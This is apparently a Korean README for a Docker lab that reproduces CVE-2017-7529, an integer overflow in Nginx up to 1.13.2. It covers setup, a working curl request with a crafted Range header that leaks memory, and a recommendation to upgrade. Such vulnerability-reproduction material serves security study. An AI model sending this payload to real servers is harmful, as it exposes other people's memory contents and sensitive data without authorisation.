
CVE-2017-7529 Nginx 정수 오버플로우 취약점을 위한 Docker 기반 재현 환경으로, 조작된 Range 헤더를 통한 정보 노출을 시연하며 단계별 익스플로잇 가이드를 제공합니다.
Nginx는 고성능 웹 서버이자 리버스 프록시, 캐시 서버 등으로 널리 사용되는 오픈소스 웹 서버입니다.
Nginx 1.13.2 이하 버전에서, 정수 오버플로우로 인해 공격자가 Range 헤더를 조작하여 원래 응답 범위를 벗어난 메모리 조각이나 민감한 정보를 유출할 수 있는 취약점이 존재합니다.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
이 취약점은 단순한 HTTP 요청만으로 정보 노출(Information Disclosure) 을 유발할 수 있습니다.
민감한 설정 정보나 기타 유출 가능한 데이터가 포함될 경우, 심각한 보안 사고로 이어질 수 있습니다.
패치: Nginx 1.13.3 이상으로 업데이트 권장
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서